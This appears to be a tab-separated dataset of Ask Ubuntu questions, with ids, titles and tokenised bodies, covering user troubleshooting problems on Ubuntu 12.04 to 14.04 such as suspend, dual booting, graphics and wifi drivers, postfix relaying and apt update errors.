452908	how to disable suspend in 14.04 ?	for some reason ubuntu had not been having good support for suspend . creating the /etc/polkit-1/localauthority/50-local.d/com.ubuntu.disable-suspend.pkla file with the below disabled suspend option in the main menu in 12.04 . but , the same does n't work after moving from 12.04 to 14.04 . [ disable suspend by default ] identity=unix-user : * action=org.freedesktop.upower.suspend resultactive=no how to disable suspend in 14.04 ?
452910	how do i replace another linux distro ( eos ) with 14.04 ?	i have elementary os luna ( 12.04 based distro ) distro installed on my dual boot ( win 8.1 ) laptop . i booted up a live usb of 14.04 but unfortunately i do n't get a straight up simple option of replacing the eos set up completely . so i guess i have to manually install in under something else install option . how do i go about this as i do n't want to mess anything up . thanks in advance .
452914	installing ubuntu 14.04 on a f2fs partition	how can i install ubuntu 14.04 on a f2fs partition ? i created the partition with gparted but during the installation the ubuntu installer could not recognize the filesystem on the partition . i heard it is possible to install with the alternative dvd but they say it is only available for lubuntu .
452915	nvidia gpu not upto satisfactory level after 14.04 upgrade	before upgrading from saucy to trusty , i was happily using nvidia drivers for my geforce gt 635m gpu . the heating and battery draining rates were under check . and the fps were high . after the upgrade , i got ( for the first time ) list of nvidia drivers in the settings > > softwares & updates > > additional drivers section . i selected the 331.38 proprietary drivers and ubuntu tells me that the device is using the recommended driver . the fps are high , and the heat and batt drainage is better than when the gpu was always on ( before installing the drivers and bumblebee ) , so i know that the gpu is working as expected . but comparatively , i still feel that the heat generation and battery drainage is more than what i used to get in saucy . any ideas how i can check/improve the performance ?
452917	i ca n't open the ubuntu	i ca n't open the ubuntu system after upgrading , the whole screen turn into gray once i turn on my pc and switch to ubuntu . but i know that it 's something wrong with the ubuntu but not my pc ( because now i am using windows and it is working ) ! what should i do ?
452918	problem with booting ubuntu 14.04 from a btrfs partition	i have installed windows 8.1 update 1 . after that i have installed ubuntu 14.04 on a btrfs partition . however , after the restart there was no grub menu to choose from and the system booted directly to windows . could it be the problem with btrfs ? i will try to install now on ext4 and let you know if it works .
452920	how to customise ubuntu 's splash screen ?	i was wondering how to change the splash screen ( for example the background picture and the ubuntu logo . . . etc. ) . i would really like to change it , does anybody know how ? i am running on 14.04 lts .
452923	windows colon did not open	i used double os in my laptop , that is windows 8.1 and ubuntu 14.04 . but in ubuntu , the windows colon is not open . i try to open that colon , but some error is display and did not open .. so what can i do ? that error is unable to access windows 8.1 error mounting /dev/sda2 at /media/lovelykousic/windows 8.1 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/lovelykousic/windows 8.1 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
452927	external hdd accidentally unlocked from launcher	in ubuntu 14.04 i accidentally unlocked from launcher my external hdd . how can i have it back there ? thank you in advance
452929	guake background no more transparent in 14.04	after upgrading from saucy to trusty , the guake pull-down window is displaying the wallpaper as the background . what i want is that it should be 50 % transparent and display whichever window i am working on currently below the guake terminal . ( like it used to on saucy ) i checked the settings and they are in line with the expected transparent behavior .
452932	constantly shuting down	i am new to ubuntu , so please excuse me , if this is a silly question . i have a toshiba u500 - 10e , with windows 8 32bit installed . i have installed ubuntu 64bit but while running it , the fans of the laptop are always turned on although i was not even working with inkscape or gimp . after talking with my friends , i uninstalled ubuntu 64bit and started working with the 32bit version . but today i was just working for 1h50m maximum , after that my fan starts working again and the laptop shuts down . with windows 8 everything worked perfectly , only when i installed ubuntu it started doing this , any suggestions ? if you need more details about graphics card , processor or laptop in general , just let me know .
452933	intel centrino slow speed ( 14.04 )	first , i 'm using ubuntu 14.04 in a xps 14 with intel centrino advanced-n 6235 wlan card . my wlan speed is terrible , i get 5.5~6mb/s using wlan , for comparison i have another notebook with killer-n wlan card , and i get 20~23mb/s speed download . using ethernet i get 25~28mb/s in both notebooks . ( all tests using nearest university download mirror , unlimited download speed , my isp link is optical fiber 200mb ) . some say to disable n-mode , but does it mean the `` 802.11n support '' ? i mean , my card is a/b/g/n , if i disable this `` n-mode '' will it `` disable '' the 802.11n speed connection ( 54 mbit/s to 600 mbit/s ) , if so i will be stuck with the slow 802.11a/b/g speeds , and this would n't help at all , because they are slow ! how can i get better speeds using this wlan card ? update # 1 : i tried the `` disable n-mode '' thing , and it did n't work , my computer do n't even connect to the router as it 's configured to work in n-only network , and i wo n't change it , i wo n't cap my whole network because of ubuntu !
452934	can ubuntu have persistent storage on a sd card	can you have persistent storage on sd card ? i heard you can for usb , but does it work with a sd card ?
452935	how to change theme colors ?	i have searched the web and can not find an easy way to change the brown/orange colors to something like greens . are there tools/tips to change the theme colors ?
452939	graphics hardware warning when updating to 14.04	as i use ubuntu at work i just update only lts versions but now i 'm not sure if i can/should . as my computer is now ten years old i would change if was mine but as it is owned by my employer i have to work with it . it 's not a bad one , it runs fine ( this was not true when still had windows on it ; - ) . when updating to 14.04 , it warns about possible bad/slow performance with unity 3d so i stop updating as i am at work , not my own computer . as i understand from http : //askubuntu.com/a/438958/25305 nvidia geforce fx 5500 graphics card is still supported in 14.04 . now , in 12.04 , i have driver version 173 and unity 2d runs fine for me . output of /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce fx 5500/agp/sse2 opengl version string : 2.1.2 nvidia 173.14.39 not software rendered : yes not blacklisted : no glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no should i update ? is it better to stay with 12.04 ? thanks
452944	delete ubuntu files after windows installation	yesterday , i installed windows 64bit over ubuntu because i had troubles with syncronising my devices . so today i will install ubuntu as a dualboot , i just want to make sure , that all ubuntu files are deleted . i just put in the windows cd in my laptop , booted from it and deleted all partitions and insalled windows . i also had to download after the installation a lot of updated and i installed microsoft office 2010 . after that , i saw that already 29 gig of my harddrive are in use . is this normal ? how can i make sure that all linux files are deleted ? many thanks for your help edhirdel
452945	black screen if no dvd drive is present	i have used an external usb-attached dvd drive to install kubuntu 14.04 beta 2 , 64bit edition on an older hp mini , without any problem ( standard installation , auto-partition the hard drive , standard plasma desktop ) . everything works as long as the dvd drive is present during boot . if i boot without the dvd drive ( which is the normal mode for a portable device ) , i get the infamous black screen with mouse pointer . the kde boot splash screen shows up , but before the last symbol ( the kde symbol ) comes fully up , the screen slowly turns to black . i can get a terminal with ctrl+alt+f1 , but if i do startx , i eventually get to the same black screen . curiously , the guest account works ( after a fashion ) , albeit with a somewhat mangled plasma/netbook-like desktop . this ( and the fact that simply the presence of an optical drive fixes the problem ) i take to mean it 's not a driver problem , but probably is an issue with kde ? ! ? i have spent a lot of time googling and trying various solutions ( upgrading the system , doing a systems restore from grub , moving ~/.kde and let kde rebuild , ... ) but it seems that other people have not had this particular problem , or i am not asking the right question . any help is appreciated . i will gladly supply any further information for diagnostics . /etc/fstab is identical with and without the dvd drive .
452948	apt terminal progress bar source code ubuntu 14.04	i have read an article in omg ubuntu [ 0 ] about enabling the progress bar in the terminal . i 'm browsing apt launchpad page [ 1 ] and browisng the code . someone knows exactly where is the code for the progress bar ? i 'm browising the correct launchpad page code or is another ? thanks in advance [ 0 ] http : //www.omgubuntu.co.uk/2014/04/how-to-enable-apt-terminal-progress-bar [ 1 ] https : //code.launchpad.net/~ubuntu-branches/ubuntu/trusty/apt/trusty
452951	how to install gcc 4.9 on ubuntu 14.04 ?	now that gcc 4.9 is officially released , is there an easy and convenient way to install it on ubuntu 14.04 through the package manager ( ie . apt-get ) ? i would also appreciate information on how to properly configure my system to use it as its compiler .
452952	printer pagepro 1490mf not working although driver installed	i followed the instructions and installed successfully the driver from the vendor 's website . now the printer is responding ( i hear a noise from the printer as soon as i send a print request ) but at the end nothing is printed . what do i need to do to be able to print to the pagepro 1490mf from ubuntu ?
452960	maas is n't showing trusty as a deployable distro	i am running maas 1.3.1 on ubuntu 12.04.3 . i added the trusty os to /etc/maas/import_pxe_files ( releases= '' precise raring trusty '' ) . i ran the maas-import-pxe-files script and it seemed to have downloaded trusty , but i am not seeing it in the as a deployable release . is there anywhere else i need to set this ? or is trusty downloading as an rc ( or something similar ) and maas is n't willing to deploy it .
452961	ca n't start lightdm anymore since i installed dbus	i am looking to read a sata port in java , and saw i could do so installing dbus , so i downloaded dbus from here http : //www.linuxfromscratch.org/blfs/view/svn/general/dbus.html and installed it ( only later i understood it was already installed ) . it seemed to work , so i went on and read about the other packages i 'd have to install . next , i reboot the computer , and i 'm stopped at the ubuntu loading screen ( i use ubuntu 12.10 ) , with the 5 dots staying orange . using the console interface , i tried to reinstall dbus and other random packages but that did n't work . i also modified the status file , tried reinstalling dpkg , ubuntu desktop etc ... when i try to execute start lightdm with sudo or without and with the -- test option , i got the error : failed to connect to socket dbus : /var/run/dbus/system_bus_socket : no such file or directory i tried to tamper with /var/run and /var/lock and links to /run/var /run/lock but nothing does the trick . i post this using startx , but i do n't have the sidebar , nor can i do alt+tab etc ... it does n't stop my work but certainly slows it down , so if somebody had a solution i 'd take it . thanks .
452964	where to set my dns on ubuntu 64 bits ?	on ubuntu 32 bits i decalred my dns in /etc/resolv.conf now that i installed ubuntu 64 bits i do not find this file . i edited /etc/network/interfaces and /etc/hosts but there is no /etc/resolv.conf . so i went to the network manager and i set everything graphically there . but when i run : sudo service network - interface restart interface = eth0 i still can not ping www.google.fr where can i find the equivalent file for resolv.conf in order to declare my dns ? what can i do to connect ? must i deleted my files editions since i did the settings graphically using the network manager ?
452969	make last clicked window stay on top in unity	is there a way to force the last active window to stay on top of all other windows in unity ? or any other gui for that matter ? it really annoys me , when a program after finishing a task or when starting a new one , decides that it is more important than anything else i might be doing at that moment and jumps on top of all other windows .
452979	resolution does n't change when resizing virtualbox window	i 've installed ubuntu 64bit on virtualbox 4.2.16 . guest additions were installed in ubuntu as well . however the display resolution of ubuntu does not seem to change as the virtualbox window is resized or if we were to go into full screen mode . any ideas ?
452983	unable to install `` terminator '' in ubuntu 12.04	i am trying to install `` terminator '' in ubuntu 12.04 . but it returns this error : the following packages have unmet dependencies : terminator : depends : python ( > = 2.5 ) but 2.7.3-0ubuntu2.2 is to be installed depends : python-vte but it is not going to be installed depends : python-gtk2 ( > = 2.14.0 ) but 2.24.0-3 is to be installed
452985	dual-boot installed ubuntu touch , link android userdata to /home/phablet , google chat and calendar syncing	i did dual-boot installation of ubuntu touch 14.04 r302 on my nexus 4 and would like to make a link under the /home/phablet/pictures directory to my pictures created with android saved in /userdata/media/0/dcim so that i can see them in the gallery . how can i do that ? anyway , the problem is the following : if i copy some music to ~/aaa and issue sudo mount -- bind ~/aaa ~/music/aaa as phablet , the music is not seen by the music scope . same is true for video scope and gallery app . strangely , if i copy contents of ~/aaa to ~/music/bbb , the music is recognized by music scopes . can someone confirm this ? why is this ? others questions for ubuntu touch : -is there a way to use google chat/hangouts on ubuntu touch ? if yes , how ( i ca n't find it neither in browser nor with gmail app ) ? -google calendar is synced but when i add an event on ubuntu touch it is not synchronised with google server . how can i set sync settings : how often it syncs calendar and whether syncing is bidirectional or not ? thanks for help in advance !
452986	is there a way to copy installed application into another os ?	i have ubuntu 13.10 on both of my laptop and pc . i 've installed many applications on my pc . i do n't want to download all these apps again and reinstall them on laptop . what method should i take to copy installed app into another ubuntu ?
452987	error during installation of ubuntu 14.04 ( lts ) in windows 8.1	i am currently using windows 8.1 and trying to install ubuntu 14.04 lts . i want to use ubuntu side by side with windows 8.1 , therefore i was trying to install ubuntu in a different drive than c. after downloading the .iso file and installation using wubi , i get the message `` an error occurred : permission denied . for more information please see the log file ... ... . '' i am not a computer geek : - ) . any help and suggestion would be appreciated . thanks .
452989	bars ( program icons & time + networking ect.. ) are n't showing when login	i was playing about with ctrl + alt + f1 , i obviously done something wrong and if you ask me what i done wrong i do n't know . i 'm still able to access my files and such through folders on my desktop . i 've tried ctrl + alt + f2 , r , does n't work . for further assistance how do i generate an error display for you 's to understand the issue more
452991	how to use microsoft sidewinder x4 keyboard	last christmas i got a brand new microsoft sidewinder x4 keyboard it works like a charm . but the macro keys and other special keys dosent work , unless you install the software that comes with it . i have installed wine and tryed start the setup.exe . then i get this error : setup can not continue because an unexpected error has occured . so what to do .
452993	gray blocks in applet menus	i 've themed my ubuntu , but now i 'm having gray blocks in my applet 's menus . for example in the messages applet , battery applet , volume applet and the calendar applet . it looks like this : i think i 'm missing a png in the theme folder or a css rule , but i 've no idea where it could be . does anyone know how to fix this ?
452995	how to adjust window placement in unity , ubuntu 14.04 based on overlapping top bar	ever since i upgraded to ubuntu 14.04 from 13.10 , i will have windows that open with the top bar of the window obscured by the top bar of the screen . i can move the window once it is open , and then accessbut it is a minor inconvenience to do so . i saw some historic threads that mentioned a compiz manager to adjust this , but i did n't know if it was still the preferred way or if it was obsoleted . i think the issue is that the window that opens is too large to be fully displayed in the screen , and before the os preferred to put the window bar just under the top bar . i was missing more on the bottom , but i could easily access the bar to close the window . now it seems to split the difference and put the window centered with a bit obscured at the top and the bottom . i am missing the bar at the top , and i do n't see the bottom of the window either . thanks ! edit : posted screenshot of issue .
452997	postfix forwarding email through relay	i have a drupal web server set up on an ubuntu 12.04 system . i 'm using postfix and dovecoat sasl as my mta . i am also using hostgator as my mail relay . there is no problem sending mail to external addresses . there is a webform which sends email to info @ hostname.com . what i can not figure out is how to tell postfix this account does not exist on the server ( i.e . no user account ) , and to forward it through the relay . the email account does exist at hostgator , which we then access through imap . postfix -n : alias_database = hash : /etc/aliases < br > alias_maps = hash : /etc/aliases < br > append_dot_mydomain = no < br > biff = no < br > broken_sasl_auth_clients = yes < br > config_directory = /etc/postfix < br > inet_interfaces = all < br > mailbox_size_limit = 0 < br > mydestination = chemalytics.com , ligand.chemalytics.com , localhost.chemalytics.com , localhost < br > myhostname = ligand.chemalytics.com < br > mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 < br > myorigin = /etc/mailname < br > readme_directory = no < br > recipient_delimiter = + < br > relayhost = [ prizm.websitewelcome.com ] :587 < br > smtp_sasl_auth_enable = yes < br > smtp_sasl_password_maps = hash : /etc/postfix/sasl_passwd < br > smtp_sasl_security_options = < br > smtp_tls_cafile = /etc/ssl/certs/ca-certificates.crt < br > smtp_tls_note_starttls_offer = yes < br > smtp_tls_security_level = may < br > smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache < br > smtp_use_tls = yes < br > smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) < br > smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination < br > smtpd_sasl_auth_enable = yes < br > smtpd_sasl_local_domain = < br > smtpd_sasl_path = private/auth-client < br > smtpd_sasl_security_options = noanonymous < br > smtpd_sasl_type = dovecot < br > smtpd_tls_auth_only = no < br > smtpd_tls_cert_file = /etc/ssl/certs/server.crt < br > smtpd_tls_key_file = /etc/ssl/private/server.key < br > smtpd_tls_loglevel = 1 < br > smtpd_tls_received_header = yes < br > smtpd_tls_security_level = may < br > smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache < br > smtpd_tls_session_cache_timeout = 3600s < br > smtpd_use_tls = yes < br > tls_random_source = dev : /dev/urandom < br >
452998	ubuntu 14.04 freeze after opening movie player	i have problem a problem with the ubuntu 's video player , every time when i go to open it , the system start to freezing but the mouse moving , i have reinstalling it but the problem has not solved . i have do anything but the problem has not solved please help me ! ( but before update from 12.04 to 14.04 the movie player on ubuntu 12.04 works very well , but after 6-10 days shows this problem on ubuntu 14.04 after installing avg anti virus , sorry for my bad english . )
452999	can i install usplash ?	i just had a nostalgic flashback to ubuntu 7.04 and remembered usplash and how much i liked it ( i think it was the progress bar ) . while plymouth is cool , it just does n't do it for me . how would i go replacing plymouth with usplash ? how can i easily change the splash screen between the two ?
453000	pkgsel failed for openstack	if i run the command from ubuntu 12.4.2 : tasksel -- list-tasks the output shows openstack as one of the tasks , but in a kickstart file if i use % package @ openstack then it says ca n't find the package openstack and pkgsel fails during pxe installation . moreover , in the gui task-sel during installation openstack is not listed while the gui tasksel from the installed os lists openstack and several others . this is really confusing . please help me understand why this is happening . thanks in advance .
453004	isc-dhcp-server	i have installed and configured isc-dhcp-server on ubuntu server 12.04 , it works fine for all pcs in my network , but it does not work for android devices.is there any option i can add to solve this problem ?
453009	upgrade from 13.10 to 14.04 with live usb	is it possible to upgrade 13.10 to 14.04 with live usb ?
453012	proper adobe flash setup	when prompted to select a download of adobe flash for my 32 bit ubuntu 12.04 system , i am given 4 choices . which is the proper choice ? yum , tar . gz. , rpm , and apt are the choices given . thank you . gb
453016	evolution calendar notifications	i have a strange problems . a year ( maybe longer ) i switched from evolution to thunderbird/lighting . uninstalled evolution and all is fine . i upgraded from ubuntu 13.10 to 14.04 and now i am getting old recurring calendar notifications again . these are old ones that would have been in the old evolution install . i double checked and evolution is still uninstalled . opened dconf editor and it does have an evolution in it but not sure what if anything would be changed in it . any ideas on this would be great . thanks !
453020	how to fix gutenprint	how can i diagnose gutenprint crashes ? no error message other than `` plugin crashed . '' the problem started when i followed online advice to backlevel my cups to stop problems printing to an epson 725 . that did n't work , so i reinstalled current cups . my printer works now , but now gutenprint always crashes on startup . reinstalling gutenprint does n't change anything . this is ubuntu 12.04 with gnome .
453021	ubuntu not booting right . no taskbar . no unity . no left bar . no programs . error windows do n't have a title bar	i keep ubuntu up-to-date . i turned on my computer today and it was slow to boot , only reponding after i moved my mouse a bit . then it got to the screen with an error message but the error message did n't have a title bar/header . there was no taskbar . i could n't pull up the left bar or open unity from the super key . i could n't open the terminal from ctrl-alt-t . the only thing i could do was do ctrl-alt-delete . the task manager pulled up in the top left of the screen without a title bar . my cpu usage was erratic and wildly fluctuating . ram was steady . i noticed a bump in my network usage . what should i do ?
453024	ungroup / explode new gnome-shell applet menu	since lasts ubuntu and specially the 14.04 , the gnome shell system menu is grouped in a very nasty way that force you to click on it a dozen of time before being able to do anything , i do n't know if it 's yet another brilliant idea of ubuntu ( for tablet compliance ) or gnome-shell idea , for user friendliness but it sucks ! is there any way to enable the old gnome-shell way of doing things , that allow me to click on each applet seperatly and moreover to let bluetooth shown at any time . now when i want to connect to anything i have to fight so hard with my mouse that i loose myself in the nested menu . if you do n't know what i 'm talking about i 'm talking about that s*** in the top right corner .
453029	problem starting after updates	i recently updated a large number of requested auto updates on my system , so left it for a few hours to do it . i came back after the system auto-restarted with a plain purple background not showing my wallpaper and the login screen . i am able to login and use the keyboard , but once i login i am left with a plain black screen and my cursor stuck in the middle of the screen which wo n't respond . i am on ubuntu 12.04.4 , any help would be appreciated as i 'm completely new to the os due to being on windows beforehand .
453030	libreoffice documents on line uploading problem ubuntu	i upload any document from website by renaming under .ods or .odt extensions in my pc files . afterwards , when i close web page or firefox navigator ( were the document were got from ) , libreoffice closes automatically . then , case by case i have to `` recover '' and open document from my pc file . before send this question i updated all softwares in my pc , but it was in vain . any help and suggestion will be highly appreciated . regards , jhs chile
453031	gpu temp in conky	how do mesure gpu temp in conky . found this code : $ { voffset 7 } $ { goto 40 } $ { voffset -4 } gpu : $ { font droid sans : style=bold : size=8 } $ { execi 60 nvidia-settings -query gpucoretemp | perl -ne 'print $ 1 if /gpucoretemp.* ? : ( \d+ ) ./ ; ' } 째c $ { font } $ { alignr } motherboard but this onely gives the result 0 rpm . so what to do
453033	qualcomm atheros qca9565 / ar9565 wireless network adapter -- ubuntu 14.04	after the upgrade of my laptop to 14.04 , i have problems to enable the wi-fi . my wireless card is 01:00.0 network controller [ 0280 ] : qualcomm atheros qca9565 / ar9565 wireless network adapter [ 168c:0036 ] ( rev 01 ) i had tried the `` tricks '' from here and here but nothing worked . the proposed solutions applied for 12.04 so i believe that 's why i am not able to enable the wireless . i tried also the below : sudo rfkill unblock all sudo rfkill list but with no luck.. 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : hci0 : bluetooth soft blocked : no hard blocked : no i tried also with the super+f12 and/or fn+f12 but the message is the same in `` network manager '' : wi-fi is disabled by hardware switch from all the above it seems that the hardware is blocked ( somehow ) . from bios i also enabled whatever related with `` wi-fi/wlan '' but again no luck . the result of lsmod is : module size used by snd_hda_codec_hdmi 46207 1 snd_hda_codec_realtek 61438 1 joydev 17381 0 ath3k 13318 0 btusb 32412 0 intel_rapl 18773 0 coretemp 13435 0 kvm_intel 143060 0 snd_hda_intel 52355 3 snd_hda_codec 192906 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel rfcomm 69160 8 snd_hwdep 13602 1 snd_hda_codec bnep 19624 2 snd_pcm 102099 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel bluetooth 395423 23 bnep , ath3k , btusb , rfcomm uvcvideo 80885 0 rts5139 335409 0 kvm 451511 1 kvm_intel videobuf2_vmalloc 13216 1 uvcvideo snd_page_alloc 18710 2 snd_pcm , snd_hda_intel videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core arc4 12608 2 crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi ghash_clmulni_intel 13259 0 ath9k 164164 0 cryptd 20359 1 ghash_clmulni_intel ath9k_common 13551 1 ath9k snd_rawmidi 30144 1 snd_seq_midi ath9k_hw 453856 2 ath9k_common , ath9k snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi ath 28698 3 ath9k_common , ath9k , ath9k_hw snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq mac80211 626489 1 ath9k psmouse 102222 0 serio_raw 13462 0 i915 783485 2 snd 69238 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi drm_kms_helper 52758 1 i915 cfg80211 484040 3 ath , ath9k , mac80211 drm 302817 3 i915 , drm_kms_helper soundcore 12680 1 snd i2c_algo_bit 13413 1 i915 toshiba_acpi 22901 0 sparse_keymap 13948 1 toshiba_acpi toshiba_bluetooth 12852 0 video 19476 1 i915 wmi 19177 1 toshiba_acpi parport_pc 32701 0 mac_hid 13205 0 ppdev 17671 0 lp 17759 0 parport 42348 3 lp , ppdev , parport_pc nls_iso8859_1 12713 1 hid_generic 12548 0 usbhid 52616 0 hid 106148 2 hid_generic , usbhid r8169 67581 0 mii 13934 1 r8169 ahci 25819 4 libahci 32168 1 ahci does anyone have an idea what else should be done in order to enable my wireless card ? is there any backport software from which i can pull the necessary driver or is already included in linux-kernel ? thanks in advance ! pavlos
453034	is there any way to install empathy 3.12 on ubuntu 14.04 ?	i have just upgraded ubuntu to 14.04 and i was disappointed to see that the empathy version supplied with it ( 3.8.6 ) still suffers from the same problems that were introduced in ubuntu 12.10 , where the contacts are huge and can not be sorted by status ... consequently i have to scroll down through tens of 'idle ' people i never talk to , to find the contacts i want alphabetically ( this used to work fine on the version supplied with 12.04 ) . version 3.9.4 carries some fixes to the contact list sorting , so i was hoping that at least this version ( which was released in july ) would come with the new ubuntu 14.04 . is there any way to upgrade to the latest empathy version safely ?
453037	error occur when sudo apt-get update	below error was occur after upgrading ubuntu 14.04 from 13.01 : ( gedit:15234 ) : ibus-warning ** : the owner of /home/jez/.config/ibus/bus is not root ! jez @ jezzonefly : ~ $ sudo apt-get update 忽略 http : //archive.ubuntu.com trusty inrelease 忽略 http : //archive.canonical.com saucy inrelease 忽略 http : //ppa.launchpad.net saucy inrelease 忽略 http : //archive.ubuntu.com trusty-updates inrelease 命中 http : //archive.canonical.com saucy release.gpg 忽略 http : //archive.ubuntu.com trusty-backports inrelease 忽略 http : //ppa.launchpad.net saucy inrelease 命中 http : //archive.ubuntukylin.com:10006 trusty release.gpg 忽略 http : //archive.ubuntu.com trusty-security inrelease 命中 http : //archive.canonical.com saucy release 忽略 http : //ppa.launchpad.net saucy inrelease 命中 http : //archive.ubuntu.com trusty release.gpg 命中 http : //archive.ubuntukylin.com:10006 trusty release 命中 http : //archive.canonical.com saucy/partner sources 忽略 http : //ppa.launchpad.net saucy inrelease 获取：1 http : //archive.ubuntu.com trusty-updates release.gpg [ 933 b ] 命中 http : //archive.canonical.com saucy/partner amd64 packages 命中 http : //ppa.launchpad.net saucy release.gpg 命中 http : //archive.ubuntukylin.com:10006 trusty/main amd64 packages 命中 http : //archive.ubuntu.com trusty-backports release.gpg 获取：2 http : //archive.ubuntu.com trusty-security release.gpg [ 933 b ] 命中 http : //archive.canonical.com saucy/partner i386 packages 命中 http : //ppa.launchpad.net saucy release.gpg 命中 http : //archive.ubuntukylin.com:10006 trusty/main i386 packages 命中 http : //archive.ubuntu.com trusty release 忽略 http : //ppa.launchpad.net saucy release.gpg 获取：3 http : //archive.ubuntu.com trusty-updates release [ 58.5 kb ] 命中 http : //ppa.launchpad.net saucy release.gpg 命中 http : //ppa.launchpad.net saucy release 命中 http : //ppa.launchpad.net saucy release 忽略 http : //ppa.launchpad.net saucy release 命中 http : //ppa.launchpad.net saucy release 命中 http : //ppa.launchpad.net saucy/main amd64 packages 命中 http : //ppa.launchpad.net saucy/main i386 packages 命中 http : //ppa.launchpad.net saucy/main amd64 packages 命中 http : //archive.ubuntu.com trusty-backports release 命中 http : //ppa.launchpad.net saucy/main i386 packages 获取：4 http : //archive.ubuntu.com trusty-security release [ 58.5 kb ] 忽略 http : //archive.canonical.com saucy/partner translation-zh_cn 忽略 http : //archive.ubuntukylin.com:10006 trusty/main translation-zh_cn 忽略 http : //archive.canonical.com saucy/partner translation-zh 忽略 http : //archive.ubuntukylin.com:10006 trusty/main translation-zh 忽略 http : //archive.canonical.com saucy/partner translation-en 忽略 http : //archive.ubuntukylin.com:10006 trusty/main translation-en 命中 http : //archive.ubuntu.com trusty/main sources 命中 http : //ppa.launchpad.net saucy/main amd64 packages 命中 http : //archive.ubuntu.com trusty/restricted sources 命中 http : //ppa.launchpad.net saucy/main i386 packages 命中 http : //archive.ubuntu.com trusty/universe sources 命中 http : //archive.ubuntu.com trusty/multiverse sources 命中 http : //archive.ubuntu.com trusty/main amd64 packages 命中 http : //archive.ubuntu.com trusty/restricted amd64 packages 命中 http : //archive.ubuntu.com trusty/universe amd64 packages 命中 http : //archive.ubuntu.com trusty/multiverse amd64 packages 命中 http : //archive.ubuntu.com trusty/main i386 packages 命中 http : //archive.ubuntu.com trusty/restricted i386 packages 命中 http : //archive.ubuntu.com trusty/universe i386 packages 命中 http : //archive.ubuntu.com trusty/multiverse i386 packages 命中 http : //archive.ubuntu.com trusty/main translation-zh_cn 命中 http : //archive.ubuntu.com trusty/main translation-en 命中 http : //archive.ubuntu.com trusty/multiverse translation-zh_cn 命中 http : //archive.ubuntu.com trusty/multiverse translation-en 命中 http : //archive.ubuntu.com trusty/restricted translation-zh_cn 命中 http : //archive.ubuntu.com trusty/restricted translation-en 命中 http : //archive.ubuntu.com trusty/universe translation-zh_cn 命中 http : //archive.ubuntu.com trusty/universe translation-en 获取：5 http : //archive.ubuntu.com trusty-updates/main sources [ 3,405 b ] 获取：6 http : //archive.ubuntu.com trusty-updates/restricted sources [ 14 b ] 获取：7 http : //archive.ubuntu.com trusty-updates/universe sources [ 648 b ] 获取：8 http : //archive.ubuntu.com trusty-updates/multiverse sources [ 1,790 b ] 获取：9 http : //archive.ubuntu.com trusty-updates/main amd64 packages [ 10.1 kb ] 获取：10 http : //archive.ubuntu.com trusty-updates/restricted amd64 packages [ 14 b ] 获取：11 http : //archive.ubuntu.com trusty-updates/universe amd64 packages [ 1,602 b ] 获取：12 http : //archive.ubuntu.com trusty-updates/multiverse amd64 packages [ 6,362 b ] 获取：13 http : //archive.ubuntu.com trusty-updates/main i386 packages [ 8,704 b ] 获取：14 http : //archive.ubuntu.com trusty-updates/restricted i386 packages [ 14 b ] 获取：15 http : //archive.ubuntu.com trusty-updates/universe i386 packages [ 1,601 b ] 获取：16 http : //archive.ubuntu.com trusty-updates/multiverse i386 packages [ 6,386 b ] 命中 http : //archive.ubuntu.com trusty-updates/main translation-en 命中 http : //archive.ubuntu.com trusty-updates/multiverse translation-en 命中 http : //archive.ubuntu.com trusty-updates/restricted translation-en 命中 http : //archive.ubuntu.com trusty-updates/universe translation-en 命中 http : //archive.ubuntu.com trusty-backports/main sources 命中 http : //archive.ubuntu.com trusty-backports/restricted sources 命中 http : //archive.ubuntu.com trusty-backports/universe sources 命中 http : //archive.ubuntu.com trusty-backports/multiverse sources 命中 http : //archive.ubuntu.com trusty-backports/main amd64 packages 命中 http : //archive.ubuntu.com trusty-backports/restricted amd64 packages 命中 http : //archive.ubuntu.com trusty-backports/universe amd64 packages 忽略 http : //ppa.launchpad.net saucy/main translation-zh_cn 命中 http : //archive.ubuntu.com trusty-backports/multiverse amd64 packages 命中 http : //archive.ubuntu.com trusty-backports/main i386 packages 忽略 http : //ppa.launchpad.net saucy/main translation-zh 命中 http : //archive.ubuntu.com trusty-backports/restricted i386 packages 命中 http : //archive.ubuntu.com trusty-backports/universe i386 packages 忽略 http : //ppa.launchpad.net saucy/main translation-en 命中 http : //archive.ubuntu.com trusty-backports/multiverse i386 packages 忽略 http : //ppa.launchpad.net saucy/main translation-zh_cn 忽略 http : //ppa.launchpad.net saucy/main translation-zh 命中 http : //archive.ubuntu.com trusty-backports/main translation-en 忽略 http : //ppa.launchpad.net saucy/main translation-en 错误 http : //ppa.launchpad.net saucy/main amd64 packages 404 not found 错误 http : //ppa.launchpad.net saucy/main i386 packages 404 not found 命中 http : //archive.ubuntu.com 